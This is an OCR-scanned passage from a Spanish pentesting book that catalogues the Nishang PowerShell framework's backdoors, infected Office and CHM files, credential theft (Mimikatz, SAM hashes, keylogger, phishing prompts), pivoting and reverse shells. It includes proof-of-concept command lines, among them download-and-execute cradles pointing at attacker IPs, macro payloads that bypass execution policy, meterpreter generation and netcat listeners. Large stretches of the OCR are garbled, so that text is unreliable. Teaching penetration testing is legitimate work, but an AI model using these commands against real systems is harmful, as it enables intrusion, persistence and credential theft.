interesantes y funcionales. 


Gather. Este módulo proporciona funciones que ayudan a la recopilación de información 
ás agresivas configurando un keylogger sobre el 


tiles en la post-explotación como, 


del sistema. Algunas de las funciones son m 
sistema. Este módulo tiene funciones muy ü 


por ejemplo. 


II m 
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Invoke-MimikatzWdigestDowngrade la cual dun 


Windows npeará c 
ows 8.1 y Windows Server 2012. P Ontraseñas en texto plano de sistemas 


- Pivot. Este mó 
. módulo proporcio i 
es na funciones 
máquinas con el objeti í que ayudan a reali i 
AEE GE ia get Ciim de lograr pivotar entre ellas. Por ejemplo, se nd legent Vv 
Hiis cn aqi pa otras máquinas, copiar y ejecutar Nación iih gita a i 
erentes equipos. Un A re otras máqui 
a) . Uno de ] : : quinas o 
explotación de cualquier test de intrusión. os módulos imprescindibles en la pos 


- Prasadhak. Este mó 
A módulo consta de una funció 
Li itii nt nsa unción, la cual che s 
q n ejecutando en la máquina contra la base de datos ^" Vin € E" em 
"us Total. 


- Scan. p po p y p 


E] la fu 


Nishang 
" ódulo se 
- Shells. Este módulo i : dulo 
á : proporciona diferentes funci i 
través de dif: nciones que ayud ; 
PowerShell —— Las shells que se obtienen, en la dmn ^" bere shells a 
pl ivas, lo cual es algo muy útil en la post-explotació ipie i 
s que pueden ser utilizados son TCP, UDP, ICMP o HTTP EE OAE 


- Utility. Este mó 
(V. módulo proporciona di 
E. a diferentes funci 
utílidades puede A à s funciones a modo de utili 
Fi vai p n ser utilizadas durante diferentes fases del test de i ió —— A 
er como funciones extra, pero ütiles st de intrusión, por lo que se 


Prasadhak, Scan, Escalation y Antak 


Estos 4 módulo i 
à s han sido agrupa : z 
funciones. grupados debido a que están compuestas por una cantidad baja de 


El primero d 
e ellos, Pasadh j 
nr a mn o capaz de calcular los hashes de los procesos que ejecut: 
po go quin a base de datos de VirusTotal. El módulo scan Satana ire en el 
puede ser válida en gunos pas IO de fuerza bruta, que aunque no sea la dior veni 
à scenarios bajo ciert ici solución, 
proporciona funcione : as condiciones. El ter: 5 > 
s cer mód vealati 
relacionadas con la escalada de privilegio. Por último, Ant " vci sag 
3 » Antak proporciona la 


11 
^ S criben las 1CIOnes que co o n esto 


F Descripción 
Antak ntak es una webshell escrita en ASP.Net el cual utiliza PowerShell. Cad 
7 Cada 


comando es ej 
Enaüle- ;jecutado en nuevo proceso 
DuplicateToken 


Esta función lanza un 
payload que permite dupli 
; ! plicar el Access toki y 
El payload debe ser ejecutado con permisos vimos weis 


Pentesting con PowerShell 


Descripción 
Esta función elimina actualizaciones del sistema de forma silenciosa. El primer 
ejemplo es Remove-Update All, el cual elimina todas las actualizaciones del 
sistema. El segundo ejemplo es Remove-Update Security, el cual elimina las 
actualizaciones de seguridad de la máquina. El tercer ejemplo es Remove- 
Update KB2761226, el cual elimina la actualización KB2761226 


Esta función calcula el hash MD5 de los procesos que se ejecutan en la 
máquina y los contrasta contra la base de dato de Virus Total. Un ejemplo es 
Prasadhak —APIKey <APIKey> 


Esta función realiza un ataque de fuerza bruta contra SOL Server, Active 
Directory, Web o FTP. Un ejemplo sería Invoke-BruteForce -ComputerName 
targetdomain.com -UserList C: lusers.txt -PasswordList C: wordlist.txt 
-Service ActiveDirectory -StopOnSuccess. Este ejemplo lanza fuerza bruta 
contra el directorio activo, utilizando un listado de usuarios y un listado de 
contraseñas 


Remove- 
Update 


Prasadhak 


Brute-Force 


Esta función realiza un escaneo de direcciones 1P, nombres de kost y puertos 
abiertos en la red. Un ejemplo sería Port-Scan -StartAddress 192.168.0.1 
-EndAddress 192.168.0.254 -ResolveHost —ScanPort, 


Port-Scan 


Tubla 3.39: Funciones de Prasadhak, Scan, Escalation y Antak en Nishang. 


Backdoors 
Esta categoría agrupa funciones que pueden ser utilizadas para instalar 


consiguiendo ejecutar instrucciones a través de diferentes protocolos, co 
s entornos, como por ejemplo dónde el pentester 


de un protocolo permitido como el 
poder volver a ejecutar 
tituyen en este módulo. 


backdoors en el equipo, 
mo por ejemplo HTTP o 
DNS. Las funciones son realmente útiles en alguno 
tiene acceso físico y necesita descargarse los scripts a través 
DNS. o un entorno dónde el pentester necesita instalar una backdoor para 
instrucciones, A continuación se enumeran las diferentes funciones que cons 


Descripción 
Esta función ejecuta un payload el cual realiza una consulta a una 
dirección URL la cual contiene una magic string. Si el magic string que 
introduce el pentester coincide con el del parámetro CheckURL se cargará 
el módulo o función al que se apunta con el parámetro PayloadURL. 

El argumento Arguments indica que función se ejecutará de todas las 
que puedan existir en PayloadURL. A continuación se muestra un 
ejemplo sencillo HTTP-Backdoor -CheckURL http:/pastebin.com/raw. 
php?i-jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i =Zhyf8rwh 
Information -MagicString start123 -StopString stopthis 


HTTP-Backdoor 


-Arguments Get- 


RA 
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Función 


l pentesting 


— Descripción 
a funci i 
Krenkai — : €! de realizar consultas a registros TXT 
MES Ea VE E NS. Se deben configurar las instruccion "s 
MM Os registros TXT del servidor DNS. El seri » f 
ie ip Aer del servidor DNS se debe gen à : 
ut-DnsTxt, el cual se encuentra en la MR Lud i 


E HE 
sta función lanza un payload el cual permite programar d 
cuando 


se ejecutarán las instrucciones remotas. C uando se cumpl: 

Up kn qi ig Va — el script de PowerShell Y 7 o. 
pode — nTime -PayloadURL http:/pastebin.com/raw. 
(o ar P gu mo Get-Information -Time hh:mm -CheckURL 
E p = in.combraw.php?i=ZIwf8rwh -StopString stoppavload l 
E. e pap m una backdoor que es capaz de leer los 
ttd dg > " a iin de los SSID de las redes Wireless que se 
iir a a n ejemplo sería Gupt-Backdoor -MagicStrine op3n 

hs ride i unción buscará el SSID que comienza con op3n. Si 
jecutar un comando, por ejemplo whoami, el nombre de 
Wireless debería ser op3ncwhoami | 


Esta función ej 
ción ome una backdoor la cual puede utilizar Windows Screen 
- aver para ejecutar comandos y scripts remotos 
sta función ej ‘ki 
- -— ejecuta una backdoor la cual puede utilizar ADS. Alternar 
€ " ] T 5 i i 
a Streams, y el registro de Windows para lograr persistencia 


DNS TXT Pwnage 


Execute-OnTime 


Gupt-Backdoor 


la red 


Add- 
SernSaveBackdoor 
Invoke- 
ADSBackdoor 


Tabla 3.40; Funciones de Backeloor en Nishang. 


Client 


Este módulo proporciona funciones que permite crear archiv 
se pueden ejecutar instrucciones de PowerShell a travé > 
los cuales pueden ser utilizados por e > 
instrucciones en una máquina y obten 
este módulo. 


pn 


pu función permite crear archivos con extensión CHM. los cuales 

^s poi infectados pudiendo ejecutar comandos y iieo. 
R bet O seme sería Qut-CHM -Pavload "Caf Process a 
eese m : bd " Ber (x86) H F ML Help Workshop ", dónde se 
vom E et- rocess en el interior del fichero cuando éste sea 
n ejemplo válido sería conseguir ejecutar una shellcode al abri 
este tipo de fichero l pac 


os de tipo Word, Excel, JAR, con los que 
nia : ER módulo consta de 6 funciones, 

ler par ros usuarios y conseguir ejecutar 
er un privilegio. A continuación se describen las funciones de 


Out-CHM 


EM Pentesting con PowerShell 
Descripción 


Esta función crea un archivo de Word y lo infecta para ejecutar comandos y 
scripts de PowerShell. Como primer ejemplo se puede visualizar éste Out- 
Word -PayloadURL http://yourwebserver. com/evil.ps! -Arguments Evil, 
con el que con el parámetro PayloadURL se indica de dónde se descargará 
el script al abrir el fichero y con el parámetro Arguments se le pueden pasar 
argumentos, por ejemplo para invocar una función que se encuentre en el 
interior del script. Otro ejemplo sería Out-Word -Payload “PowerShell.exe 
-ExecutionPolicy Bypass -noprofile -noexit -c Get-Process ” el cual crea un 
fichero de Word y cuando éste se ejecute se ejecutará la macro a través de 
PowerShell 
Esta función crea un archivo de Excel y lo infecta para ejecutar comandos y 
scripts de PowerShell. Esta función es similar a la denominada Out-Word 
Esta función permite crear un fichero HTA el cual puede desplegada sobre 
un servidor web y utilizado en campañas de phishing 
Esta función permite crear un fichero JAR firmado, el cual puede ser 
utilizado como applet para ejecutar comandos y scripts de PowerShell. 
Como puede visualizarse, este fichero es otra vía para realizar un client- 
side 
Esta función permite crear un fichero de acceso directo, es decir con 
extensión . Ink, el cual permite la ejecución de comandos y scripts a través 
de PowerShell 


Qut-Word 


Out-HTA 


Out-Shorteut 


Tabla 3.41: Funciones de Client en Nishang. 


Execution 
Esta categoría o módulo de Nishang permiten al p 
protocolos, permitiendo la ejecución de código y 


funciones de este módulo. 


entester descargar código a través de diferentes 
de scripts. A continuación se describen las 


Descripción 


Esta función descarga y ejecuta un script de PowerShell en memoria. 
Un ejemplo sería Download-Execute-PS http://dominio.com/script.ps1 
-Argument script. En este ejemplo se descarga el script desde una ubicación y 
se ejecuta la función que se indica en Argument 


Download- 
Execute-PS 


Esta función permite descargar un ejecutable en formato texto, convertirlo a 
uña ejecutable y entonces ejecutarlo. Puede ser una buena solución para evadir 
E mecanismos de red que puedan evitar que la descarga llegue a la máquina 
Execute E > > à 
dónde se encuentra el pentester. Un ejemplo sería Download Execute http:// 
example.com/file.txt 
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Est ió UN 
a función permite ejecutar comandos de PowerShell comandos nati 
> nativos de 


Execute- 


Command- d 
cmd o 
MSSQL comandos SQL sobre un MSSQL Server con los privilegios sufici 
Execute- T: "een dina 
ONETU Coi Esta función permite ejecutar una shellcode en memoria utilizando cons 
a registros TXT de un servidor DNS configurado por el pente E 
ster 
Tabla 3.42: Funciones de Execution en Nishang. 
Gather 


Este módulo en i i 
sitim res MR que permiten realizar recopilación de información sensible o ju 
EL p a. Funciones que permiten extraer los hashes de la máquina binc 
iin e ae es Mtas a las que se conecta la máquina, extraer las pr n " à 
n ataque de phishing de credenci i sJ . 
i ealiz ` nciales en sistemas Window. i i 
se describen las funciones pertenecientes al módulo de Gather — 


Descripción 


Esta función chequea si se está ejecutando en un entorno de 
máquina virtual o no hay ningün entorno de virtualización 
corriendo 


Check-VM 


Esta función lanza una ventana de login interactivo la cual 
reportará lo que el usuario introduzca en texto plano al 
pentester. Esta función es un ataque de phishing. Conseguir le 
credenciales en remoto a través de este engaño es viable 7 


Invoke-CredentialsPhish 


Este par de scripts ayudan a realizar egress testing. En otras 
palabras, cuando el pentester consigue acceso a un eni o 
quiere verificar si desde éste se puede acceder a Internet 2: - 
red en cualquier puerto. Con FireListener se abren puertos y con 
FireBuster se intenta conectar con dichos puertos Y 


FireBuster & FireListener 


Esta función recopila información jugosa desde un equipo. La 
información dependerá de los privilegios con la que se Viento 
la función. A modo de resumen se puede encontrar aplicacione 
instaladas, información sobre redes inalámbricas. usuario i 
grupos locales, política de cuentas, información sbe SNMP 
recursos compartidos, hosts y sesiones de Putty, etcétera | 


Esta función copia el fichero SAM utilizando Volume Shadow 

Copy Service. De este modo se pueden copiar ficheros que están 
protegidos o bloqueados por el sistema. Hay que tener en cuenta 
que habrá que tener permisos para ejecutar VSS 


Get-Information 


Copy-VSS 
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— — mud O Descripción | 
Get-LSASecret Esta función extrae los LSA Secret 


Esta función extrae los nombres de usuario, identificador y 
Ger-Paiehlashes hashes LM y NT del fichero de cuentas SAM : 
Esta función recopila información sobre las redes inalámbricas 
almacenadas en el equipo 
Esta función permite capturar las pulsaciones de teclado desde 
una máquina comprometida 
Esta función realiza un dumpeo de contraseñas en 2 plano en 
equipos Windows 8.1 y Windows Server 2012 


Get-WLAN-Keys 


Keylogger 


Invoke- 
MimikatzWdigestDowngrade 


Tabla 3.43: Funciones de Gather en Nishang; 


c ivoti áquinė redes. Las 
Este módulo proporciona funciones para la realización de pivoting entre maquinas y 


iones : mente ütile 
funciones presentadas son reali : ng a ah 
a llegar a más sitios, dónde quizá al comienzo del proceso no podía lleg 


i 'unci ef S Pivot. 
A continuación se describen las funciones que forman el módulo 


Descripción 


Esta función permite al pentester chequear las — E: 
diferentes máquinas y crear diferentes PSSessions en om x rel. 
Esta es una de las vías para pivotar a través de las redes y: e 
diferentes máquinas. Un ejemplo sería Create- MultipleSessions 
-filename .servers.txt -CreateSessions 


Create- MultipleSessions 


Esta función permite copiar y ejecutar un fichero pen rice 
máquinas. Es similar a lo que se puede llevar a cabo con 
PSTools 

Esta función permite gestionar relays a nivel de red. Trabaja 4 

nivel de IPv4 e IPv6, incluso permite hacer v6tov4. Un nup 
sería Invoke-NetworkRelay -Relay v4tov4 -ListenA uH P 

192.168.254.141 -Listenport 8888 -ConnectAddress 192.1 6 : me 

-ConnectPort 445 -ComputerName 192.168.254.14 1. Se aña ee 

relay el cual escucha por IPv4 y reenvía lo que llega al pueto 

i al puerto 8888 de otra máquina de la red 


Run-EXEonRemote 


Invoke-NetworkRelay 


Tabla 3.44: Funciones de Pivot en Nishang. 


s en la fase de post-exploitation, ya que ayudan al pentester 
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Shells 


Este módulo proporciona diversas funciones que ayudan a obtener una PowerShell interactiva a 
través de diferentes protocolos, como pueden ser TCP, UDP, HTTP o ICMP. Incluso, se pueden 
ejecutar órdenes sobre PowerShell apoyándose en servicios como Gmail para transferir las órdenes. 
A continuación se describen las funciones del módulo Shells y Se muestran algunos pequeños 
ejemplos de ejecución. 


Función 


Descripción 


Esta función es muy potente proporcionando una PowerShell 
interactiva en remoto, ya sea a través de una conexión bind o reverse. 
Un ejemplo de ejecución sería Invoke-PowerShellTcp -IPAddress 
«dirección IP? -Reverse —Port <número puerto. Por otro lado el 
atacante podría configurar en su máquina un nefcat, por ejemplo con 
nc- -p <número puerto? 


Invoke-PowerShellTep 


Esta función permite enviar comandos y/o scripts a una cuenta de 
Gmail. Esta función es ejecutada desde la cuenta del atacante o 
del pentester y configura los datos de la cuenta. Por otro lado se 

utilizará la función /nvoke-PsGcatAgent o Powercar sobre la máquina 
objetivo. Estas funciones realizarán la descarga del comando o del 

script y se ejecutará 


Invoke-PsGcat 


Invoke-PsGcatAgent 


Invoke-PowerShellUdp 


Ejecuta comandos y seripts los cuales son enviados por /nvoke- 
PsGcat 


Esta función proporciona la posible ejecución de una PowerShell 
interactiva, tanto en modo bind o reverse. ejecutándose a través del 
protocolo UDP 


Esta función proporciona una PowerShell interactiva inversa a 
través de HTTPS. Un ejemplo de ejecución es Invoke-PoshRatHttps 
-IPAddress 192.168.56.101 -Port 8443, mientras que en el cliente se 

ejecuta /System.Net.ServicePointManager]::ServerC. ertificateValidati 

onCallback = f$true] :iex (New- Object Net.WebClient).DownloadStri 
ng( "https://192.168.56.101:8443/connect ") 

Esta función proporciona una PowerShell interactiva inversa a 

través de HTTP. Un ejemplo de ejecución es Invoke-PoshRatHttps 

-IPAddress 192.168.56.101 -Port 80, mientras que en el cliente 
se ejecuta ¡ex (New-Object Net. WebClient).DownloadString 

("http://192,.168.56. 101/connect") 

Esta función limpia el sistema después de utilizar /nvoke- 

PoshRatHttps 


Esta función proporciona una PowerShell interactiva utilizando WMI 


Invoke-PoshRatHttps 


Invoke-PoshRatHttp 


Remove-PoshRat 


Invoke-PowerShellWmi 
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Descripción 


Esta función proporciona una PowerShell interactiva a través del 
protocolo ICMP. Por ejemplo, sobre una máquina Linux controlada 
por el pentester se puede utilizar iempsh_m.py, el cual es parte de 
las iempsh tools. En primer lugar se ejecuta sysctl -w net.ipv4.icmp _ 
echo ignore all—-1 y, posteriormente, se ejecuta python icmpsh m.py 
«dirección IP pentester> «dirección IP target>. Una vez realizado 
esto se ejecuta en el /arget la instrucción Invoke-PowerShelllemp — 
IPAddress «dirección IP pentester> 


Invoke-PowerShelllemp 


Tabla 3.45: Funciones de Shells en Nishang. 


Utility 

Este módulo de Nishang proporciona funciones que pueden ayudar al pentester a realizar algunas 
acciones. Este grupo de utilidades proporcionan persistencia a los scripts, permite realizar descargas 
de ficheros o encodear y decodear scripts o strings. Esta última parte es muy importante ya que se 
puede juntar con la parte de shells con el fin de ejecutar instrucciones más complejas a través de los 
EncodedCommand. ^ continuación se describen las funciones del módulo Utility. 


Función Descripción 
5 ' Esta función permite añadir la capacidad de filtrar datos a través de 
Add-Exfiltration P " 


Gmail, Pastebin, un servidor web o DNS 


Add-Persistence Esta función añade persistencia al scrip! 
: Elimina la persistencia de un script, la cual fue añadida previamente 
Remove-Persistence 


por Add-Persistence 
Do-Exfiltration 


Esta función proporciona capacidades de pipe en su salida 


Esta función proporciona descarga de ficheros hacia la máquina 
Parse Kevs 


comprometida 
Invoke-Encode 


Esta función parsea palabras clave recogidas previamente por el 
Invoke-Decode 


keylogger 
Esta función encodea y comprime un script o u 
Esta función decodea y descomprime un scrip! o un string 


n string 


Tabla 3.46: Funciones de Utitliy en Nishang. 


PoC: Backdoors, jugando con DNS y Wireless 


En esta prueba de concepto se hablará sobre las backdoors que Nishang proporciona, especialmente 
sobre las que se encapsulan a través del protocolo DNS y la que puede comunicarse con los SSID 


de las redes Wireless. 


A 
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El primer ejemplo presentado es el de la ba 


ha ekdi dl iliza e 
ia ci oor que utiliza el protocolo DNS. Est 


Nis. ^ : ; 
shang en una de las conferencias dónde presentó su fa LP 
"an 


| iework. 
Para llevar a cabo esta prueba se necesita 
manipulable. En este servidor DNS creara u 


ejecutar. Nishang proporciona una función d 


que el pentester tenga el control d 
n registro TXT especial con el cont 
enominada Out-DnsTxt dentro de ] 


e un servidor DNS 
enido que se quiere 
e a categoría Utility 
Esta función : g tility. 
erm i 
ii permite obtener un EncodedCommand de un script, comando o sh 
entrada. Cada línea deberá almac - 0 o shellcode que se pasan 


loisina aiti ; enarse en un TXT diferente dentro i 
g màxima de cada registro TXT es de 255 caracteres y esto es algo a à bid DNS. La 
a en cuenta, 


-DataToE m 
in single pdo e Sedet Process -IsString 


Fig. 3.45: ió ji ió 
ig. Obrención de instrucción encodeada para almacenarla en un registro TXT. 


Una v i tri 

z 2 obtiene el string se debe pasar al servidor DNS del 
r otro lado, si se quiere encodear un ser 

DnsTxt -DataToEncode «Ruta script, por 


| pentester creando un regi 

ipt completo se puede utilizar la sigui i hein as 
i : 1izar la siguiente instrucción Our- 
ejemplo Get-WLAN-Keys. ps1. 


Una vez el pentester ha creado el registro TXT en e 
lite] que se obtiene el EncodedCommand. 
Dipe=txt <subdominio creado, por ' 
se obtiene de Out-DnsTxt debe ser 


To cda 

ervidor DNS se puede utilizar nslookup 
P ad m por ejemplo con la instrucción nslookup — 
7gemplo 1.fu-project.com>. Hay que recordar que c. 


lu-proj ada línea 
un subdominio diferente en el servidor DNS -— 


1.64 
"pVRLbsUgDNxX6k264A/VOE mz 


l.script 1 
dZJRas9swEMfBIoOhSuHBGa7e 


"YG6rsJJFN8XJyQGCIACYeoao! 


"KolSIrGISZfE pXy85yws4H/s O.JkF 


"S'IbE4F TjcUHmCsb2MGODATF. 


"ROW. r8EHSjL58z/dmiEg/NochP1 


command - 
Get-Process" 


encscript ^ U 
XVttc9s4kv6cVOU/ABTNIjSRGJ. 


"cGVybCAITUIPICTIICckcD 1mb3 


/"startscript" 


"sto 
Fig. 3.46: Configuración del servidor DNS. 


O 
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os registros TXT 


Ahora DNS TXT Pwnage es capaz de recibir estos comandos o seripís a traves de | 
algo como DNS_TXT_Pwnage -StartDomain start.flu-project 
IDomain command.flu-project.com -psstring startscript 
Subdomains 3 -StopString stop. 


Para este ejemplo se puede ejecutar 
com -cmdstring begincommands -Commanc 
-PSDomain script.[lu-project.com -Arguments Get-WLAN-Keys - 


Applied: All User Profile 


Profile information 


1 
Hireless LAN 
m Hotel -— .--- 
Control options 
Connection mode : Connect automatically z 
Network broadcast : Connect only if this network is broadcasting 
AutoSwitch : Do not switch to other networks 


Connectivity settings 


Number of SSIDs 1 
SSID name O 2 5 -— 
Network type : Infrastructure 

: [ Any Radio Type 1 


Radio type 
Vendor extension Not present 


Security settings 
Authentication : WPAZ-Personal 
Cipher : CCMP 


Security key Present 


Fig. 3.47: Ejecución del script recuperado a traves del DNS 


El segundo ejemplo presentado es el de la backdoor que recibe los comandos a través del SSID de 
una WiFi cercana a la máquina comprometida. La backdoor denominada G 
ente. a través de la lectura de los SSID. 


upt permite ejecutar los 


comandos, como se menciona anteriorm 


Gupt chequea todas las redes Wireless de su alrededor para encontrar un patron adecuado. La 
büsqueda de redes la realiza cada 5 segundos. 


La función hace hincapié en 2 partes o parametros diferenciados. El primero conocido como 
MagicStrine de 4 caracteres de longitud, el cual es utilizado para identificar el SSID que contiene 
el cual ayuda a decidir si se quiere 


. el segundo se corresponde con el quinto Car 
El quinto carácter debe ser o una "c 


los comandos ácter, 
ejecutar un comando o descargar y ejecutar un Scrip. E, S1 SE 
quiere ejecutar un comando. o una “u” si se quiere descargar un script y ejecutar 

Para ejemplificar esto se van a presentar 2 pequeños ejemplos, el primero configurando un SSID con 
el que Gupt ejecutará un comando y un segundo descargando un script y ejecutándolo. 
configura, ya sea a través de su dispositivo móvil o de un punto de acceso controlado 
". Al ejecutar la instrucción Gupi- 


edes 


Si el pentesti 
j| un SSID con el siguiente nombre 


por él, "pablcget-process 
la función comenzara a ree 


lizar búsquedas sobre las r 
configurado. Cuando la 


" ejecutará el 


MagicString pabl —Verbose. 
| SSID matchean con el MagicString 
al encontrar una "C 


Backdoor 
para ver si los primeros 4 caracteres de 
o comprobará el quinto carácter y 


o Get-Process. 


función encuentre un SSID válid 
comando que va después, en este cas 
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ER z - - 

E ice vireless netuorks for instructions 

Checking IIIS netuorks for instructions. 

reless netuorks for inst ions. 

1 RE E: struct s 

necking wireless networks for In PUCCAURI. 

und a netuork with instructions? E 
get-process" found. Executing it 


Command 


NPM<K> USCK» UMCM> 


AERTS 164 

armsuc 

augcsrua 

augrsa 

augtray 
auqudsuc 
BTHSAmpPalService 
BIHSSecuritulMgr 
btplayerctrl 
capius 

conhost 

conhost 

conhost 

conhost 

csrss 

csrss 

deumonsru 
dllhost 


Fie. 3.48. "citció 
ig. 3.48: Ejecución de comandos a través de la red Wiri 


Ahora, si se > i 

. Si se quiere lograr la ejecuc j J 

y E juiere lograr la ejecución de scripts Gupt descargará y ejecutar: i 

carácter del nombre de la red es “u”. Después de la “u” se b abt iu "ital oa 
i s de la “u” se debe encontrar la parte de una dirección 


? “an te. € y. 
RL recortada con Google URL shortener 


Er ( as palabras £ C C C 0. SI C GDI Hi un 
S, Y C ) LIC / 
e eje pio I SSI 5 bli £ Ig la di cc m IRI ria / 
) 1 in e De MU 1 j i S Hp 


El parámetro Ár i rrr riii 
zm y ai ^ P - iemoria directamente 
rguments permite pasar argumentos al script descargado i ha 

i al script descargado. Un uso interes 


7 ol. n JEuue vara 1 "char . 
gi/nJEuug para des gar y ejecutar e i } 

I descargar y ejecutar el script. El script se ejecutari 
tener el script Invoke-Shellcod. j pee 
| els De ww wd — ante seria 

ellcode. por ejemplo, y descargarlo a través de la dirección URL d 
g avés URL pasada < 


través del SSID. 


Checking wire le 


^ networks * 3 ^ T 
Checking wirele works for instructions. 


i networks for inst 1 
d ruct E 
ocina MES netuorks for instructions. 
Shec sire le networks for i qum 

i ir s instruct 
Checking vireless netuorks for IhECRUCCIARE. 
S. 


^00Wu 
A Man 


t 


gbecking vireless netuorks for instructions 
BEOUA. A dos with instructions? id 
ading the attack script and executing it in memo 
; ry. 


;] 
Fig. 3.49: D. wea de «erint s 
£ Descarga de script y ejecución a través de SSID de / WiF 
€ m ae ned WIPI 


de Client-Side Attack con Nishang 

-n esta prueba de conce 

esta prueba de concepto se presenta el concepto de Client-Side utilizado desde F Shell. ! 
ado desde PowerShell. 


erto que Nisl io 1 i - 
rt a ep ~ e ` t f 1 d 
] ame I I or cione uncione qu I e c crear icherc NI que pue en ser ut | zac 
tan. opo ona Jones e permi ser izado 


O | À)—P?  333O 3 33 
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MEN 


para ejecutar instrucciones una vez son abiertos. Este tipo de ficheros son ideales para enviar, por 
ejemplo, por correo electrónico o hacer llegar de alguna manera a la víctima. 


El ejemplo está presentado por el autor de Nishang en su sitio web. En este pequeño ejemplo se 
puede comprender como va creando diferentes ficheros de Word, los cuales tienen comandos en su 
interior que permiten ejecutar instrucciones tras abrirlos. 


En primer lugar, la ejecución de Out-Word -Payload "PowerShell.exe -ExecutionPolicy Bypass 
-noprofile -noexit -c Get-Process ” proporciona un fichero que ejecutará un proceso PowerShell y 
lanzará la instrucción Get-Process. Esta primera ejecución es una prueba básica de la función. 


La segunda prueba que se muestra es la siguiente Out-Word -PayloadURL http://192. 168.56.101/ 
PowerShell payload.ps1. El payload es cargado desde una ubicación externa y el psi podría ser 
cualquier tipo de código, por ejemplo una Meterpreter generada de la siguiente manera msfpayload 
windows/x64/meterpreter/reverse ícp LHOST-192.168.56.101 exitfunc=thread R | .Amsfencode -t 
psh > PowerShell | payload.psl. 


El último ejemplo mostrado es el siguiente: 

Invoke-Encode .|Get-WLAN-Keys.ps1 PostScriptCommand; Out- Word —Payload 'powershell 
ExecutionPolicy Bypass - noprofile -c Invoke-Expression $(New-Object IO.StreamReader 
/S(New-Object IO. Compress ion.DeflateStream ($(New-Object IO. MemoryStream 
(. S([Convert]:: FromBase64String( ' 'dZJRb9 MwEMffLfk7nL1* IBJJXxhNSRSuVUVCIOKZLO 
UCAJjeSxmaOHdmXtdPGd8dpqmnASItl3 /1//zv7dq0pSFkDHS5Hiayl MfIn3Hjh74OztGWdJ/ 
nWIzvJFztlKeSIMBZm4 1 laUsJeqk! "C2dePhthPtrIPr5WwFjbM7pdEnnAXC* jl+cbXINo 
vHirONVB6aE* GZVhkoNAoHhAcÓkry4w 1143 kbik7xuPcEWwbUGds 7WIDyIslZGeXKCA 
oMsVERhAQdS59PXMv&w3 Zcs5ZIKkO077vYHLs? xhfLlaXnEmiZpymjfWys CUmliXpó6zfn5 
33bEhI CISLbbpLB I GKUdDIWX9j YJ/TNxdjbtcN8u6lljvVOmVK Yajn4EX* FEDcNRF4awBvv 
W7h4mYJC8hO4EAbV/6hseIUeNBct ISuUCBOBNEGAxEM63hs0cH WZSbhdwP1qEoZLze 
gwaeBjcJBvbK4ejXydPPDTWI IRmqDsanCIGUXmGjRYHDqJP9bdfdwRii vwPTav0S/ MicP2f+10s] 
apxEg3uo? 6zJcRx61Gdh/3NAp8HE310J6+Z7h0roQJ29Bg== "JJ, 

10.Compression. Compression) lode]::Decompress)), 

[Text.Encoding]::ASCI!)). ReadToEnd(): '. 


En este caso, se encodea el script que se quiera para evitar la comunicación con Internet. 


PoC: Shells 

En esta prueba de concepto se estudian el concepto de shells disponible en Nishang. Este framework 
ofrece varias formas para conseguir una shell a través de diferentes protocolos y funciones en 
PowerShell. 


Para la realización de la prueba de concepto se utilizará la función Invoke-PowerShellTcp, la cual 
proporciona una PowerShell interactiva en remoto. En el módulo Shells se dispone de otras funciones 
que proporcionan la misma funcionalidad a través de otros protocolos. 


TE m 
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La senten si 1 à ejecutar 

^ a i cia a Ssa por el pentester o por un SCPIpI ejecut 
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I tion. Todos los derechos reservados 


C: NUsersNpgonzalez?cd Deskt op 
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Pes eje able. 


o externo, 


C:NUsersNpgonzalezNDeskt ^cd nc 
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) 2015 Microsoft Corporation. al P On H cde a 
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Fig. 3.50: Obtención de PowerShell inversa inte 


eractiva en remoto. 


7. Otros scripts en acción 
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d re captur S fi )-I 
se realiza un ; niffin obr eli se 3 IB le aquina entras que en el aai e: I E 

g S © I ` VICIO M de la m la, mi ra 

configura un listenei dedicado. 


ado de alguna manera sobre una 
everse —[PAddress 192.168.56.101 


o —— — 


Pentesting con PowerShell 


Hay que tener en cuenta que si se copian y pegan los challenge/response obtenidos a través del 
scirpt, los cuales son almacenados en un fichero de texto por el propio scripr, se deben eliminar los 


retornos de carro. 


El uso es sencillo, en primer lugar se debe tener en el proceso el máximo privilegio, por ejemplo 
logrando una cuenta de System a través de una elevación de privilegio. Puede ser necesario utilizar 
un método de bypass de la política de ejecución de scripts. La sintaxis para su ejecución es sencilla 
Inveigh.ps1 [-i «dirección IP por la que esnifar y spoofear> -LLMNR y|n —NBNS y|n -NBNSTypes 
00,03,20,1B -HTTP y|n -SMB y|n -Repeat y|n ForceWPADAuth y|n -Output 0,1, 2]. En la imagen 
se puede visualizar un pequefio ejemplo de la captura de desafío-respuesta de un hash a través del 
servicio SMB de la máquina. Esta máquina puede ser local o remota, ya que con PowerShell se 


podría ejecutar de forma sencilla este script en otra ubicación, siempre y cuando se tenga el permiso. 


rsNpabloNDesktopNInveigh-naster? .NInvueigh.psi 
tartod at 2015-08-03111:15:55 
= 192.168.56.104 


ATIP Capture 

TIPS Capture 

EMB Capture Enabled 

Repeat Spoof Suppression Disabled 
UPAD Authentication Enabled 
le Output Enabled 


zspabloDesktopyinveigh master 


e captured from 1 

39 AC8D40:8101080090 
94198 gns4a84998439941005 3002D805 08 2 63 £ 073006 F002E0063006 
B06 1007300200078086 3002 006300750072 0073 500120863087588 


073006 F002E0063A 9 DDG9106400499020090BYU8BB308030B040BABAn! 
46276F77B590B983186AB x 23254FC! TESCO ES a EA 
90390032002E803190036 9398! 349000gpgae aa ae ag OB OP OO ROO 


sNpabloNDesktopNInueigh nasterNInueigh-NILMu2 txt 
6.1804 — NBNS spoofing is disabled 
poofing i 
poof ing 


ADUERTENCIA: SMB NTLNY2 challenge/r 
D815-88-03T11:16:32 NBNS request 
Dui5-08-03111 request for 
ppi5-08-03111 K request for CURSOC4 
D915-08-03111 request for CURSO< 
Dg15-08-03T11: d NENS request for RS0<42-4D 
D915-08-03111: 3 y 3 4D 
Dpa15-08-03111 
P ED b 
54004900438! 
(070006 3002 EGa6 3807 

pcpDa019600040002 88000008 0030 

FCOABB1 BAHBGAIYOHAGGBAA: 

0003400000800 0000 00 O0 OODC OP OO 

»ablowDesktopsInveigh-mas 


PESecurity 

PESecurity es un script para chequear los binarios de los sistemas Windows, tanto ejecutables como 
archivos DLL. Con PESecurity se puede estudiar si el binario ha sido compilado con mecanismos de 
protección O seguridad como son ASLR. DEP. SafeSEH. StrongNaming y Authenticode. PESecurity 
se puede descargar desde la siguiente dirección URI https ://eithub.com/NetSPI/PESecurity. 


ASLR, Address Space Layout Randomization, evita que el atacante conozca la dirección de memoria 
